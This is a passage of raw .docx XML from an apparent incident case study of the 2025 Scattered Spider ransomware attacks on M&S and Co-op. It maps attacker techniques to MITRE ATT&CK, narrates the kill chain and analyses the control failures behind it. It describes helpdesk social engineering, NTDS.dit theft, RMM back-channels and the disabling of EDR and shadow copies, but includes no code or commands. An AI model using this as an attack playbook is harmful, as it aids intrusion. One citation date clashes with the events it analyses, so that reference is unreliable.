                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Create Account</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5F08E605" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Persistence</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736D3331" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">New privileged accounts and MFA device </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>enrollments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> created post-compromise to maintain foothold even if original credentials were rotated. (CISA AA23-320A rev. Jul 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="2677FF71"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1836AF1" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1021.001</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9AA811B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Services: Remote Desktop Protocol / VPN</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D27D5AE" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lateral Movement</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C3D4B22" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Using cracked credentials attackers moved laterally via VPN and remote-desktop pathways through M&amp;S's network for weeks prior to ransomware detonation. (Security Journal UK, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="55D1F17E"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48F4C58" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1114</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870B1F2" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Email Collection</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66772EC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Collection</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9B091B1" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Scattered Spider searched victim Slack, Teams and Exchange Online for mentions of the ongoing incident to monitor defensive activities and re-plan access. (CISA AA23-320A rev. Jul 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="498A1EDB"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22A3F78" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1219</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9D1D07C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Access Software</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138027B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Command &amp; Control</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CC415EE" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RMM tools (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AnyDesk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, ConnectWise, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Splashtop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>) deployed under the guise of IT support to maintain persistent, stealthy back-channel access. (Prelude Security; Barricade Cyber, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="7AA08F68"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52CE97C4" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1567.002</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5AA11CBC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration to Cloud Storage</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71D82CAA" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration</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D3663D5" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Customer PII and business data staged and uploaded to attacker-controlled cloud storage (MEGA, AWS-based) for double-extortion leverage. Co-op data confirmed stolen (~20 m records); M&amp;S PII confirmed exfiltrated. (Prelude Security; Computer Weekly, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="63D974B0"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CAA8F59" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1490</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64A523A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Inhibit System Recovery</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C414F83" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Impact</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09449A1" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers deleted Volume Shadow Copies and targeted backup servers/NAS devices to eliminate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>recovery paths and increase ransom pressure. (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Picus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Security, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="3D97690E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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85E5D8E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>T1486</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737CD5A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data Encrypted for Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2CDDB73" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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E6897E0" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware detonated on VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> hosts at M&amp;S on 24 Apr 2025, encrypting virtual machines and taking core retail systems offline. (Quorum Cyber; CISA, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="08A6B534" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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4A62183" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1562.001</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460A038" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Impair </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Defenses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Disable Security Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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9EF411D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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AA1B4EC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Scattered Spider is documented using BYOVD (Bring Your Own Vulnerable Driver) and EDR-killer scripts to disable endpoint-detection agents before ransomware detonation. (CrowdStrike via MITRE ATT&amp;CK G1015)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E823BD7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653EB0E6" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc227971070"/>
      <w:bookmarkStart w:id="12" w:name="_Toc228127100"/>
      <w:r>
        <w:t>2.1 Attack Flow Narrative</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="34AA1EBB" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The cyberattack adhered to a traditional Advanced Persistent Threat (APT) attack kill-chain, albeit at a criminal pace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69B3DD" w14:textId="1D8F03A0" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reconnaissance and Resource Development: The group identified M&amp;S's managed-service provider relationships and developed employee-impersonation scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B260D82" w14:textId="6855253D" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (T1598/T1199): Telephony-based social engineering of a third-party IT helpdesk (reportedly TCS) allowed account password resets for system administrators, without relying on a technical exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1278A" w14:textId="3F9159DC" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Access (T1003.003): Domain controller </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfiltration gave the group the key to the entire Active Directory - allowing offline password hash cracking for all domain users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6C7E1" w14:textId="33052F84" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement &amp; Persistence (T1078.004 / T1136 / T1021): Valid accounts and new backdoor accounts provided a path to anonymously navigate M&amp;S's poorly segmented network for about 8 weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1EC80B" w14:textId="255B45D0" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Collection &amp; Exfiltration (T1114 / T1567.002): PII and business data was collected and uploaded to the cloud (MEGA). At Co-op, it is confirmed that some 20 million customer records were exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F207E33" w14:textId="4C6E225E" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact (T1486 / T1490): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ransomware was activated on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts, disabling shadow copies and encrypting virtual machines - ensuring the greatest impact on operations and potential ransom..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C963828" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F510E7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc227971071"/>
      <w:bookmarkStart w:id="14" w:name="_Toc228127101"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Root Cause and Security Control Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="69963480" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc227971072"/>
      <w:bookmarkStart w:id="16" w:name="_Toc228127102"/>
      <w:r>
        <w:t>3.1 Human Factor — Social Engineering of the Helpdesk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4268F063" w14:textId="0CD40DB3" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">The root cause at M&amp;S was the lack of a secure helpdesk identity-verified authentication process at the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>third party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> supplier. Evidence to the UK Parliament confirmed that hackers impersonated employees, and convinced IT support to reset passwords without satisfactory verification procedures (Norman, Jul 2025). This is a failure of the NCSC's Cyber Essentials "Access Control" control domain and the lack of "manager confirmation" or "callback to registered number" verification processes required in the organisation's Identity and Access Management (IAM) policy. The IT service provider (it is believed to be Tata Consulting Services) had delegated access, but the security requirements in the contract for helpdesk verification procedures were apparently not enough to address this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDAD04B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc227971073"/>
      <w:bookmarkStart w:id="18" w:name="_Toc228127103"/>
      <w:r>
        <w:t>3.2 Third-Party / Supply-Chain Risk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3B75AE47" w14:textId="48E61704" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">This pivot via a managed service provider reveals a key organisational weakness: third-party risk. ISO/IEC 27036 offers guidance for information security for supplier relationships, but the evidence of the attack suggests either M&amp;S did not have, or did not enforce, security-baseline requirements on the helpdesk procedures of TCS. Both </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>Sangfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> (2025) and Computer Weekly (May 2025) describe the attack as a supply-chain attack because the threat actor exploited a trusted third party with high-privilege access to M&amp;S's Active Directory system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABBC40" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc227971074"/>
      <w:bookmarkStart w:id="20" w:name="_Toc228127104"/>
      <w:r>
        <w:t>3.3 Network Architecture — Insufficient Segmentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="5361B0A6" w14:textId="02856F75" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">Compare M&amp;S to Co-op. Elsey (Co-op CISO, Jul 2025) told us that their environment is "heavily segmented - part of a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>zero trust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> strategy", with critical services in separate network segments. By contrast, tightly-coupled legacy systems at M&amp;S meant that the attacker, once he stole domain credentials, was able to move laterally to the VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> management plane. The analysis of the parliamentary hearings by MTI.com (2015) found that M&amp;S's containment response required the shutdown of large areas of the environment due to a lack of architectural isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2C27E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc227971075"/>
      <w:bookmarkStart w:id="22" w:name="_Toc228127105"/>
      <w:r>
        <w:t>3.4 Detection Latency — Absence of Real-Time Behavioural Alerting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="7BAC5514" w14:textId="66124BF2" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">M&amp;S's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>8 week</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> dwell time (from initial breach in February to detonation of ransomware on 24 April) demonstrates a lack of detection. No real-time alert was triggered by the theft of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
